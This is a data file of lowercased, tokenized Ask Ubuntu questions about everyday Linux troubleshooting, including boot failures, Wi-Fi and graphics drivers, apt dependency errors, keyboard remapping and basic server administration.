389252	picasa-like image viewer for ubuntu	i am looking for an image viewer which allows me to flip through a huge number of images ( ~10000 images ) very quickly so that minute changes are visible . i need this for image classification and testing . picasa allows me to do it perfectly with easy back and forth switching so that i can identify changes in illumination , small movements and large movements . making it into a movie using ffmpeg is not an option as i require the individual images . for example , say i observed between images 24 and 25 there is an illumination change and i want to experiment on those two frames . the problem with the existing image viewers in ubuntu is that they are very slow compared to picasa while moving back and forth and hence is inconvenient . also i noticed a tendency that after 10.jpeg , the default image viewer in ubuntu switches to 11000.jpeg . and before 10.jpeg , it passes like 10999 - > 1099 - > 10 . is there any such image viewer which works like picasa ? like really smooth while moving between pictures and also in order . please note that i do not intend to edit any of the images only move through them very fast or at least fast enough .
389253	ubuntu 13.10 on ssd	i have been getting an error message after installing ubuntu 13.10 64-bin on a 500 gb samsung ssd . attempting to read or write outside of disk `` hd0 '' followed by a grub rescue prompt . i have installed ubuntu on this ssd while it was installed on a different laptop , and everything worked fine . any help would be appreciated . thank you .
389254	how can i check if a dvd is genuine ?	i have a problem and really need help . i have two dvd 's , one of this dvd is burned by me . the other one is a strange dvd from someone else , i do not really know if this dvd is fine ... both of the dvd supposed to have ubuntu on it . now , i do not know which dvd is mine ... i mean which i burned by myself . i copied this to dvd to my pc and compared the two respective folders using cmp . it showed no difference . does it mean that i can use any of it for installing ubuntu ? thanks
389258	changing hostname and serving with apache	i want to serve my website locally with my hostname . it 's gibberish now , but people in my network can reach it . let 's say my hostname is > hostname abcabcabc and , if my local people open a browser and open http : //abcabcabc , they can reach my website . i want my website to be reached at , let 's say , http : //aaa i tried changing my hostname with hostname command . it did n't work . i tried to make a new virtualhost file and typed a new 'servername` value , but it did n't work either . how can i fix this ? thanks in advance .
389259	reading device info from inside proc module	i want to read graphic card info in proc module.i created a proc module and loaded it to kernel.what i want is to show graphic card info when i call the proc from terminal . such as `` cat /proc/myprocname '' i know that my code is wrong below.but it will help you to understand what i want . # include < linux/init.h > # include < linux/module.h > # include < linux/proc_fs.h > // proc filesystem /* read proc function */ int read_proc ( char *buf , char **start , off_t offset , int count , int *eof , void *data ) { // ! ! **that 's it.i want to read graphic card info in this function . ** // ! ! this is wrong.but i want to do like this file *fd = popen ( `` lspci | grep vga '' , `` r '' ) ; char buffer [ 16 ] ; if ( fread ( buffer , 1 , sizeof ( buffer ) , fd ) > 0 ) // if there is some result the module must be loaded printk ( kern_info buffer ) ; else printf ( `` module is not loaded\n '' ) ; return 1 ; } /* module loading ... */ static int baslat ( void ) { // registering.. create_proc_read_entry ( `` proc01 '' , // file name 0 , // ( protection mode ) : default null , // ( parent dir ) : none read_proc , // callback null ) ; // return 0 ; } /* module removing.. * / static void bitir ( void ) { // module register removing.. remove_proc_entry ( `` proc01 '' , // file name null ) ; // ( parent directory ) } module_init ( baslat ) ; module_exit ( bitir ) ;
389262	ca n't set native resolution	my lenovo t61 has a native resolution of 1440x900 , but ubuntu will allow me nothing higher than 1024x768 . what can i do ? i should at least be able to go up to the native resolution of the laptop .
389264	problem bluetooth with logitech t651 on ubuntu 12.04	i have a problem pairing a touchpad logitech t651 by bluetooth , i 've tested it in android nexus 7 tablet and windows and the touchpad works . my first problem was that ubuntu 12.04 crashes when i use a usb bluetooth adapter , i installed blueman and reboot , now i have blueman-manager and ubuntu does not crash anymore when i use the bluetooth adapter . now my real problem is pairing and making works the touchpad , in the blueman-manager appears the logitech t651 like a mouse/touchpad device , then i select the option to set up a new device , in the wizard i select the device , in type use input device , in pair password use '0000 ' then try to pair but the program fails , the device is added but not connected . how can i connect the touchpad ? is there anyway to force the connection ? , i do not understand why in android and windows is to easy to connect it and in linux is really hard . is possible tha the last stable ubuntu version has fixed this problem ? ( in that case i 'd upgrade ) how can i make the connection persisten ? note : the touchpad is supposed to be desiged for mac ( tested and works on mac ) , but i 've tested on android 4.4 , android 4.2 ( multi touch works ) and windows 7 ( no gestures but pointer and two fingers scroll works ) , other people has tested it in windows 8 ( works well ) .
389265	error while installing activemq	when i am using sudo apt-get install activemq to install activemq on ubuntu 13.04 , i am getting below exception setting up activemq ( 5.6.0+dfsg-1 ) ... **/var/lib/dpkg/info/activemq.postinst : 11 : /var/lib/dpkg/info/activemq.postinst : addgroup : not found** dpkg : error processing activemq ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : activemq e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so i thought problem might be adduser is not installed to my box . ankit @ l-ankit-tech : /etc $ adduser the program 'adduser ' is currently not installed . you can install it by typing : sudo apt-get install adduser but when i am trying to install adduser , getting below exception . ankit @ l-ankit-tech : /etc $ sudo apt-get install adduser [ sudo ] password for ankit : reading package lists ... done building dependency tree reading state information ... done adduser is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 5 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y **setting up activemq ( 5.6.0+dfsg-1 ) ... /var/lib/dpkg/info/activemq.postinst : 11 : /var/lib/dpkg/info/activemq.postinst : addgroup : not found** dpkg : error processing activemq ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : activemq i am not sure , what to do . what should i do now ?
389266	ubuntu ( 13.10 ) now boots to terminal	ok , this is going to be a long and odd one ... my system is a dell xps 13 ultrabook ( just running raw 13.10 , not the sputnik system ) there was an update yesterday that required a reboot so i shut my machine down at the time and started it up this morning and it dumped me to the terminal at this point my system also has no network interfaces ( wifi ) i tried : ctrl-alt-f7 , this gave me nothing running startx from the cli , this gave me a desktop but no menus , mouse , etc running unity from the cli , this gave me an error about not being able to find a display running startx then unity , this gave me menus , but still no mouse or wifi lspci shows the devices are in the system but 'unclaimed' uname -r shows the 3.13.0 kernel , is n't 13.10 using 3.11 ? changing grub to allow me to see the menu and then using the recovery menu to boot with network enabled - this started to get me somewhere now if i boot through recovery mode i get the unity login screen , but i ca n't login ( the screen goes black and the laptop locks up ) but now if i ctrl-alt-f1 i can get wifi access . from some more googling i 've found someone suggesting : sudo apt-get install -- reinstall ubuntu-desktop and that 's when things started going odd ... the above command listed some unmet dependencies and would n't continue , but i 'd read that aptitude would be better for sorting these out . so i tried sudo aptitude reinstall ubuntu-desktop and apparently i have a load of packages from trusty . the aptitude command showed me a number of ways to resolve the dependencies and i accepted the one that meant rolling back the trusty packages , but it did n't help . so now i do n't know what 's going on . any idea what happened and how i get my system back ? edit : /etc/apt/sources.list # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) ] / raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ saucy main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ saucy main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ saucy-updates main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ saucy-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ saucy universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ saucy universe deb http : //gb.archive.ubuntu.com/ubuntu/ saucy-updates universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ saucy-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //gb.archive.ubuntu.com/ubuntu/ saucy multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ saucy multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ saucy-updates multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ saucy-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu saucy-security main restricted deb-src http : //security.ubuntu.com/ubuntu saucy-security main restricted deb http : //security.ubuntu.com/ubuntu saucy-security universe deb-src http : //security.ubuntu.com/ubuntu saucy-security universe deb http : //security.ubuntu.com/ubuntu saucy-security multiverse deb-src http : //security.ubuntu.com/ubuntu saucy-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu raring partner deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu saucy main deb-src http : //extras.ubuntu.com/ubuntu saucy main /etc/apt/sources.list.d/ contains a number of files , from the reading i 've done it 's just the .list files that have an affect so here they are : /etc/apt/sources.list.d/anton50489-test-saucy.list # deb http : //ppa.launchpad.net/anton50489/test/ubuntu saucy main # deb-src http : //ppa.launchpad.net/anton50489/test/ubuntu saucy main /etc/apt/sources.list.d/google-chrome.list # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main /etc/apt/sources.list.d/steam.list deb http : //repo.steampowered.com/steam/ precise steam deb-src http : //repo.steampowered.com/steam/ precise steam /etc/apt/sources.list.d/videolan-stable-daily-saucy.list # deb http : //ppa.launchpad.net/videolan/stable-daily/ubuntu saucy main # deb-src http : //ppa.launchpad.net/videolan/stable-daily/ubuntu saucy main # deb-src http : //ppa.launchpad.net/videolan/stable-daily/ubuntu saucy main /etc/apt/sources.list.d/webupd8team-y-ppa-manager-saucy.list deb http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu saucy main # deb-src http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu saucy main cheers , matt
389267	can no longer print with on oki c610 in ubuntu 13.10 ?	when i upgraded ubuntu to 13.10 ( from 12.10 or 13.04 i ca n't remember which its been awhile ) it stopped being able to print my oki c610 networked printer . everything used to work great . any ideas how to get the oki c610 working again ?
389268	no wifi connection on ubuntu 13.10	i have a new laptop lenovo thinkpad edge e540 and i have installed ubuntu 13.10 on it , but now i am not able to connect to the internet via wifi . it seems that ubuntu can not use my wifi card , there is no option in system settings to manage wireless connection at all . wired connection works . can anybody help me ? here is more information concerning the hardware : * uname -a * linux thinkpad 3.11.0-14-generic # 21-ubuntu smp tue nov 12 17:04:55 utc 2013 x86_64 x86_64 x86_64 gnu/linux * lsb_release * distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy * lspci * 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 10 ) subsystem : lenovo device [ 17aa:5028 ] kernel driver in use : r8169 05:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. device [ 10ec : b723 ] subsystem : lenovo device [ 17aa : b728 ] * lsusb * bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 0bda : b728 realtek semiconductor corp . bus 003 device 004 : id 04f2 : b398 chicony electronics co. , ltd bus 003 device 003 : id 138a:0011 validity sensors , inc. vfs5011 fingerprint reader bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub * iwconfig * * rfkill * 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : no * nm-tool * networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : < mac address removed > capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 147.231.103.183 prefix : 22 ( 255.255.252.0 ) gateway : 147.231.100.31 dns : 147.231.100.1 dns : 195.113.144.233 * networkmanager.state * [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true * networkmanager.conf * [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false * interfaces * # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback * resolv.conf * nameserver 127.0.1.1 search ujf.cas.cz * blacklist * [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac * udev rules * # pci device 0x10ec:0x8168 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 ''
389270	checking data usage in a mobile broadband connection in ubuntu	i use a huawei dongle to access the internet and since mobile partner does n't support ubuntu is there a way to check the data usage ? any app maybe ?
389272	installing packages from terminal	so , i tried installing a lot of packages that are in one of my folders . in the terminal i chose directory and did : `` sudo apt-get install *.deb '' i 've gotten a lot of errors that say `` could n't find any package by regex '' or something like this . i 'm doing this on computer with no internet access . what does it mean and what wrong did i did ?
389277	ubuntu 13.10 - is crashing the display not stable , how to fix it ?	ubuntu 13.10 64-bit latest version is installed in the hp eliteone 800 all-in-one touch screen pc . display is breaking over and over . is 13.10 stable yet ? its not working at all . tried with dell inspiron one same 13.10 is unstable .
389280	huwaei ec1260 not showing up as modem device	i have installed ubuntu 13.10 , and have difficulty in mobile boradband . i have a tata photon usb stick , configured as huawei ec 1260 . it shows up in lsusb as 12d1:140b , but does not show up as device when i try to add a mobile broadband connection . it also does not appear in network manager icon .
389281	partitioning hard disk by having one partiton	i have a single partition of about 465 gb with ubuntu 13.04 installed on it . now i want to make it dual boot and want to create partitions . how to do it ? thank u .
389285	transmission stopped sending torrents to download folder	my transmission was working just fine , i updated my version of ubuntu , and it still worked . a few days ago , i downloaded some files , and none of them went to the download folder . even when i click on the files directly from the transmission , it wo n't open them . as if they are n't downloaded at all . i do n't know why it suddenly stopped working , i 'm pretty sure none of the updates did it . where can i find these files ? or will i need to uninstall transmission and re-install ?
389288	can i have apt-get take my authorization credentials ?	i have a ubuntu virtual machine that i use at work . i had previously been using this without any issues but there was an update put in that now requires all outbound connections to authenticate with our internal user name and password . when i 'm using the browser on my machine , this is not a problem , i can simply type my credentials and then move on , but when i 'm running apt-get update ( or any such command ) i get bombed with failures : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/source/sources 401 authorization required [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/source/sources 401 authorization required [ ip : 91.189.91.14 80 ] is there any way i can tell apt-get to stop and ask me to input my credentials when an authorization request comes in , rather than just failing ? i ca n't find any options in the help page about this : options : -h this help text . -q loggable output - no progress indicator -qq no output except for errors -d download only - do not install or unpack archives -s no-act . perform ordering simulation -y assume yes to all queries and do not prompt -f attempt to correct a system with broken dependencies in place -m attempt to continue if archives are unlocatable -u show a list of upgraded packages as well -b build the source package after fetching it -v show verbose version numbers -c= ? read this configuration file -o= ? set an arbitrary configuration option , eg -o dir : :cache=/tmp
389292	black screen on nvidia laptop on ubuntu ( 13.10 )	i am having a problems installing ubuntu in my new acer laptop . i get a black screen i solved this problem by setting nomodeset following this answer before the installation . i installed ubuntu normally . but after i restart my laptop i have no screen . what can i do about it ? update : the problem seems to be my nvidia gpu , according to this article . but should i apply these changes when i can not see my desktop
389294	literally impossible to install xubuntu	i tried installing xubuntu with multiple bootables . installs fine but at boot or the screen is completly black or it boots but the graphics look extremly weired . im trying to install xubuntu 13.10 64 bit . ps : i even tried installing jolicloud and same problem . here is a pdf of my specs . thanks in advance
389297	bumblebee setup on dell xps 15 9530 for dual monitors in ubuntu 13.10	i am trying to setup my dell xps 15 9530 to use dual monitors in ubuntu 13.10 . the machine has the optimus chipset with an intel 4th generation card and an nvidia geforce gt 750m . i followed the instructions on the bumblebee tutorial ( https : //wiki.ubuntu.com/bumblebee ) , but am stuck trying to actually get the nvidia card working and dual monitors to be detected . ( note : right now clicking on `` detect displays '' does not detect the monitor in my mini-displayport that windows detects . hdmi is not an option at the moment , although the port does exist ) when i try to set the nvidia-settings the following happens : $ optirun nvidia-settings [ 77.278444 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 77.278495 ] [ error ] aborting because fallback start is disabled . the bumblebee tutorial discusses this and says to edit /etc/bumblebee/xorg.conf.nvidia and change the bus of the nvidia card . i have done this , and it still does n't work . please see the output below : $ lspci | egrep 'vga|3d' 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 02:00.0 3d controller : nvidia corporation gk107m [ geforce gt 750m ] ( rev a1 ) contents of /etc/bumblebee/xorg.conf.nvidia ( ignoring comments ) : section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' option `` autoaddgpu '' `` false '' endsection section `` device '' identifier `` discretenvidia '' driver `` nvidia '' vendorname `` nvidia corporation '' busid `` pci:02:00.0 '' option `` probeallgpus '' `` false '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` usedisplaydevice '' `` none '' endsection as far as i can tell , i have set the busid correctly , but the card still does n't work . i also tried installing nvidia-current from the ubuntu-x-swat/x-updates ppa , but this did not fix anything . does anyone have any suggestions as to how i can get this thing working ? please let me know if there is any more information that i can provide . thank you for your help !
389298	how do i disable telnet on ubuntu server ?	i installed ubuntu server and i am learning to how secure it . one of the article i saw , was about telnet and how to disable it on centos obviously , it does not work on ubuntu , so how can i disable telnet on ubuntu server ? ll /etc/xinetd.d/telnet ls : can not access /etc/xinetd.d/telnet : no such file or directory
389300	opening large images in firefox causes display corruption / glitches / visual artifacts	i am new to ubuntu . this is all about my problem . configuration : i 'm on an msi-ex600 laptop with 3gb ram and nvidia geforce 8400m g. the display driver currently in use is nouveau ( xserver-xorg-video-nouveau ) , the os is ubuntu 13.10 symptoms : sometimes i get these graphical glitches/artifacts/corruption that garbles up gui elements , often to the point that i ca n't use it and have to log out or restart ( it re-initializes the display i guess ) . it got really annoying so i looked into it and discovered that it happens when opening large images in firefox or thunderbird . image viewer works well , but open a 4000px wide image in the browser and my screen fries . i checked resource manager and there 's no shortage of cpu or ram ( i do n't have swap ) . another symptom is playing flash video consumes too much resources - it spins the fans like crazy . it 's not heavy lifting and this pc is n't that old , so i expect it to work . it worked fine when it had windows . it seems to be be a software issue . what i tried : trying to fix this i attempted to switch to an nvidia proprietary driver ( from software & updates > additional drivers ) . this resulted in blank screen , so i restored nouveau at boot and gave up . i tried again just now , but the latest nvidia driver does n't work . i wo n't pick another one from the list because each time it takes forever to restore nouveau from recovery mode , instead of there being a simple option to scrap last installed video driver . i tried configuring a refresh rate of 60hz at startup - xrandr -r 60 in startup applications , still did n't do the trick . how can i resolve this problem ?
389302	error pkgproblemresolver : :resolve generated breaks	i have ubuntu 12.04 lts installed on my machine , i tried to install a new version of libc6 which i downloaded from here i made that because a new version of libcv depends on it , i thought after installing libcv dependency it will be installed ! here is my /var/log/dist-upgrade/apt.log file now http : //pastebin.com/7ydwkyvr this error is preventing me from upgrading to saucy , so i need a way to fix it .
389305	quicklist arrangement and tweaks	i 'm setting up my site to use unity 's web-app integration api , but i would like more control over how the quick list is displayed . i would like to arrange the items in the same order the site shows them but the quick list seems to want to put them in alphabetical order . it would also be nice if i could add a spacer or some sort of visual break between one section of the list and another . this is what i have so far : http : //www.thescribecommons.org the question , are these available via the api ? where can i find a formatting commands list ?
389307	installing oses on extended partition	i 've been trying to triple boot my laptop with a single hdd . an ubuntu+windows+chromium os is what i want . now , i think my problem is a bit deep and tricky , but i 'd really like you guys to help me in anyway you can . so here it is . i 'm having trouble installing windows to a gpt type partition table , which means i have to stick to the mbr type . unfortunately , it only allows 4 primary partitions , or 3 primary + 1 extended partition . i know i can install ubuntu , as well as windows to logical partitions . i 'm not sure about whether chrome os can be run from logical partitions . my problem would probably be solved if i 'm able to run chrome os from logical partitions . i 'll have to keep 1 primary partition as system reserved in order for windows to boot normally . out of the 2 primary partitions left if i choose this case , both of them will go for chrome os if it 's not possible to install it to logical partitions . [ chrome os needs at least 2 partitions to run , at least that 's what i found out of my week long research. ] i read the answer in this post , and i feel it 's kinda incomplete . the answerer has n't addressed the second partition needed by chromium . neither has he addressed the swap partition needed by ubuntu . if this answer is considered , 5 primary partitions would be needed at the least . which ai n't possible with mbr . can anyone here help me with my problem please ? i 'd really appreciate your help . : )
389309	freeradius with flat file	i am trying to step up a freeradius box to use a flat file to verify the password of a particular user , but ca n't find any documentation . does anybody know where i can find some ? i 'm been googling for the last 30 mins ( apparently i am not a good googler ) . i have freeradius installed and working with local passwords .
389311	how to get an ubuntu workspace switcher that is always visible ?	i 've probably asked this question before , but is there any way to get an ubuntu workspace switcher that is always visible ? obviously , i do n't mean the full screen version . i mean a small `` thumbnail '' version , that shows tiny representations of the existing windows , and gives you the ability to drag those `` mini-windows '' in the workspace switcher . this is n't a new idea . the old solaris openwindows had this , and there have been a couple of applications on ms windows that do this , like `` sdesk '' ( there were two applications with this name ) and `` dexpot '' , which is still actively maintained .
389313	apt-get update leads to obsolete packages	the university where i study hosts an ubuntu package mirror server , which i normally use to update my repository . however , right now , i am not in the university and update packages instead from the server from india or the main server . when i run sudo apt-get update and sudo apt-get upgrade , apt-get asks to downgrade a large number of packages ( 1035 in total ) . output : http : //paste.ubuntu.com/6556854/ a related thing i noticed is that if i open synaptic , the 'latest ' packages are all quite old , e.g libunity-core-5.0-5 : installed version 5.20.0-0ubuntu2 , latest version 5.10.0-0ubuntu6 . even the latest generic linux header and image are shown to be quite old ( in fact , the one that comes during install ) -version : 3.2.0.23.25 what is the reason for this happening and how can i rectify it ? system information : 12.04 lts , 64 bit machine . kernel : 3.2.0-56-generic output of apt-cache policy cups-client : abhi @ abhinav-hp : ~ $ apt-cache policy cups-client cups-client : installed : 1.5.3-0ubuntu8 candidate : 1.5.2-9ubuntu1 version table : *** 1.5.3-0ubuntu8 0 100 /var/lib/dpkg/status 1.5.2-9ubuntu1 0 2012 http : //archive.ubuntu.com/ubuntu/ precise/main amd64 packages
389316	can not destroy rabbitmq-server	i installed a lab of openstack through juju , deployed rabbitmq-server on the same node that holds mysql . but i found that rabbitmq-server gives unsolvable hook failed error . so i tried to destroy the service to deploy it again but it does n't . i tried destroy service from juju-gui and juju destroy-service rabbitmq-server and it still there . only the unit rabbitmq-server/0 were gone . now the service `` life '' is stuck on `` dying '' rabbitmq-server : charm : cs : precise/rabbitmq-server-16 exposed : true life : dying relations : cluster : - rabbitmq-server i connected to the node and did n't find any logs related to rabbitmq at the logs directory . but i found this logs : /var/log/juju/unit-rabbitmq-server-0.log 2013-12-12 11:16:33 info juju.worker.uniter uniter.go:363 committing `` stop '' hook 2013-12-12 11:16:33 info juju.worker.uniter uniter.go:381 committed `` stop '' hook 2013-12-12 11:16:33 info juju.worker.uniter modes.go:421 modecontinue starting 2013-12-12 11:16:33 info juju.worker.uniter modes.go:84 continuing after `` stop '' hook 2013-12-12 11:16:33 info juju.worker.uniter modes.go:421 modeterminating starting 2013-12-12 11:16:33 info juju.worker.uniter uniter.go:105 unit `` rabbitmq-server/0 '' shutting down : agent should be terminated 2013-12-12 11:16:33 error juju.worker.uniter.filter filter.go:117 tomb : dying 2013-12-12 11:16:33 error juju runner.go:200 worker : fatal `` uniter '' : agent should be terminated 2013-12-12 11:16:33 error juju runner.go:200 worker : fatal `` api '' : agent should be terminated 2013-12-12 11:16:33 info juju supercommand.go:286 command finished is there anyway to force it to be destroyed completely ?
389319	error on reconnecting the usb modem	i use ubuntu 12.04 lts and my usb modem is ec-1260 . i often connect the internet using my usb modem , it works normal . but , when i click 'disconnect ' my modem then do 'connect ' it wo n't connect to provider or to be exactly the modem is failure to do 'dial ' . for solve the problem , i used to unplug then plug in again the modem.well , the problem is not a big deal but still it bugging . can i just 'disconnect ' and do 'connect ' again without doing unplug then plug in the modem ?
389321	wine apps not able to connect to internet	i have some wine application that needs internet connection to work properly . but the application says that it ca n't connect to the server ( error 403 ) . i 've tried installing lib32nss-mdns but it doesnt solve my problem . i 'm using ubuntu 13.10 64-bit , installed 32bit of wine1.6 i think ( i used synaptic to install and within the wine app it says its a x86 os ) . ( i tried wine1.7 , same result ) edit : i can access to local network but not to the internet
389327	removing only the broken package	so was about to install some packages so i could get programs that i want . and somehow one package got broken , i have no idea how . so now when i try to do sudo apt-get -f install it says broken one affects other packages . if i want to remove it , i have to remove a lot of other packages ( i think even apt has to be removed ) ( and i do n't have any programs on ubuntu that installed myself ) . is it possible to remove only the broken package or reinstall the uninstalled packages just after they were uninstalled ? remember that i do n't have internet access on any linux computer at my home right now . i am using 13.04 lubuntu version . after doing sudo apt-get check it gives me this : ( sorry for picture )
389331	how to update gnome environment after gpasswd	when adding some group users running gnome gpasswd -a user group i am unable to see the changes running id is there a way to update the environment without the need to restart gnome ? thanks
389332	how do i fix the missing reboot/shutdown issue in 13.10 ?	i am one of the unfortunate who has the problem in 13.10 whereby my reboot/shutdown button is missing from the menu bar . after googling around i found the bug being submitted but the fixes ( which apparently didnt work ) looked like manually downloading all sorts of ubuntu source codes and lots of other scary stuff . is there anything i can enter/update from the terminal which will fix this issue of the missing shutdown/restart menu ?
389333	grub rescue shows up after reinstalling ubuntu	after reinstalling ubuntu at startup grub rescue is shown with error : unknown filesystem . what am i supposed to do ? i have had dual boot with winxp and now i can not access even that .
389334	xubuntu 12.04.3 lts and ati 3000 series graphics card	will xubuntu release 12.04.3 lts support the use of amd radeon hd3650 proprietary drivers ? i am streaming video online and can not use the open source driver ; the video lags and is very poor quality . i have seen many posts on this topic , however i can not tell which version is no longer supported . if 12.04.3 does not work , where can i download an iso image of 12.04.1 or lower ? thank you . mike h
389342	failure login does not work using pam tally	i am trying pam_tally and something does not work . i have 2 servers ( myhost ) and ( server2 ) . i am trying to log to server 2 with 3 fail attempts , now when i log on the server 2 , i want to see the number of fails of my user ( i created the user dummy ) as you can see , the number of fails is still 0 ... why ? user @ myhost : /etc/apache2 $ ssh dummy @ server2 dummy @ myhost 's password : permission denied , please try again . dummy @ myhost 's password : permission denied , please try again . dummy @ myhost 's password : permission denied ( publickey , password ) . root @ server2 : / # pam_tally -- myhost dummy myhost dummy ( 1001 ) has 0 root @ server2 : /var/log # pam_tally2 -- user dummy login failures latest failure from dummy 0
389344	ubuntu 13.10 does not show up on windows 8.1	so i just downloaded ubuntu 13.10 on my windows 8.1 by watching this video : http : //youtu.be/pk7gwikay7s and restarted my computer . i did n't get the grub menu when i restarted it so i went to windows and checked for operation systems and i only got windows 8.1 . the drive that i put ubuntu on is not showing up also . any help ?
389346	what 's the difference between lts and normar releases ?	in the download section i see choices for versions 13.10 and 12.04 . also , i notice that 13.10 will be supported for 9 months and 12.04 lts has support until year 2017 . i have read information in this forum explaining ubuntu support and i guess i have an idea about what all this means . the following is the conclusion i have : if i install a short-term support version then it is a good idea to replace it as soon as a new version comes out . if i install a long-term support version then i can keep it until the end of it . support will be available for bugs , new hardware , new software , etc . am i correct ?
389350	ubuntu 13.10 webapps	in my ubuntu installation webapps do n't integrate in menu indicators : i tried grooveshark , youtube , gmail , facebook no menu integration and no notifications . p.s . i am using ubuntu 13.10 64 bit .
389352	ubuntu roll back to previous kernel : linux-image-3.11.0-11	i had too many kernel updates and the only ones that worked for me were `` pushed away '' . any suggestions on how can i reinstall kernel version `` linux-image-3.11.0-11 '' ?
389353	how can i set a certain keycode to a key and bind it to the right action ?	i have a laptop with swedish keyboard layout , everything works well with the keyboard . due to injuries i am using an external ergonomic usb keyboard , this is where i am experiencing difficulties . the external keyboard does n't have a key for control_r or alt-gr ( i guess that 's alt_r ) which causes trouble because typing @ , $ , âź and { } or [ ] all uses alt-gr in swedish keyboard layout . update : : this is not true . the keyboard comes with both control keys but was messed up due to custom remapping , read how to manage that here . after a complete reset i it turns out that the external keyboard has alt-gr ( shown as iso_level3_shift by xev ) as well ( though backticks was hard to find ) . : :end update the keyboard has a built-in remapping feature as well as macro features but there 's no way to remap keys from the on-board keyboard to the external keyboard ( as far as i know ) i would like to set one of my keys on the external keyboard to have a new keycode ( such as control_r or alt_r and then remap that to acting as alt-gr - is this possible ? the reason i do n't want the keycode control_l is , if i remap it then the other control key will be remapped as well . with xev i have checked what keycode is trigged by clicking the key of alt-gr on my on-board keyboard and that 's keycode 108 ( keysym 0xfe03 , iso_level3_shift ) . after some reasearch i 've noticed this is not expected for the alt-gr key , but this key works as i expect . with xev i also check the output for the key on the external keyboard which i desire to use as alt-gr : keycode 105 ( keysym 0xffe3 , control_l ) . i have another key on the external keyboard outputting the exact same thing , that key is the one i use for control_l , making the one i wish was alt_gr redundant . i have messed around with xmodmap to see if i can get what i need but alas , with no success . here are a few scenarios . xmodmap -e `` keycode 105 = alt_r '' # = > this disables both control keys and does n't work like alt-gr , virtually the key does n't do anything . xmodmap -e `` keycode 105 = iso_level3_shift '' # = > same as above is there a way to address these problems ? setup : ubuntu 13.10 external usb keyboard ( kinesis advantage pro )
